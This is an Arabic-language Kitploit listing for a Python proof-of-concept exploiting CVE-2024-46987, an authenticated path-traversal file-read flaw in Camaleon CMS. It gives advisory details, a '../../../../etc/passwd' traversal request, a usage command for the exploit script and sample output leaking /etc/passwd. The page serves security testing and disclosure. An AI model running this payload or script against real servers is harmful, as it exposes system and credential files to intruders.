Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46987 — استغلال تم إنشاؤه باستخدام بايثون | Kitploit
أدوات/GitHubGitHub/advaitpathak21/cve-2024-46987
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

استغلال تم إنشاؤه باستخدام بايثون

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-46987 – تجاوز المسار الموثَّق / قراءة الملفات التعسفية في Camaleon CMS

CVSS 7.7 High Python PoC

CVE-2024-46987 هي ثغرة تجاوز مسار موثَّقة (CWE-22) في Camaleon CMS (نظام إدارة محتوى مبني على Ruby on Rails). تسمح لمستخدم مسجل (حتى مع صلاحيات منخفضة) بقراءة ملفات تعسفية على الخادم عبر إجراء MediaController#download_private_file.

  • تاريخ النشر: 18 سبتمبر 2024
  • CVSS v3.1: 7.7 عالي
    المتجه: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (تحديد غير صحيح لمسار في دليل مقيد)، CWE-200 (كشف معلومات حساسة)
  • الإصدارات المتأثرة: Camaleon CMS ≤ 2.8.0 (بعض التقارير تشير إلى أنه يعمل على 2.9.0 أيضًا)
  • تم التصحيح في: ≥ 2.8.2 (موصى به: الترقية إلى أحدث 2.8.x أو 2.9.x)
  • الإعلانات:
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
    • GitHub Security Lab GHSL-2024-183

نظرة عامة على الثغرة

يمكن للمهاجم الذي يمتلك بيانات اعتماد صالحة إرسال طلب مخصص إلى: /admin/media/download_private_file?file=../../../../etc/passwd

تثبيت المتطلبات

  • pip install -r requirements.txt

أو

  • pip install -r requests fire

الاستخدام

  • أولاً، قم بإنشاء مستخدم جديد
root@kitploit:~
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • مثال للإخراج:
root@kitploit:~
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

ملاحظة: يفترض السكريبت نموذج تسجيل دخول بنمط Rails (user[email], user[password], authenticity_token). قم بتعديل حقول الحمولة إذا كان هدفك يستخدم أسماء مخصصة.

تحذير قانوني وأخلاقي

تم توفير هذه الأداة لأغراض تعليمية واختبار أمني مرخص فقط.

استخدمها فقط على أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها (مثل برامج مكافآت الثغرات، اختبارات الاختراق الداخلية، مختبرات مثل HTB). الاستخدام غير المصرح به قد يخالف القوانين. المؤلف غير مسؤول عن سوء الاستخدام.

تنزيل الأداة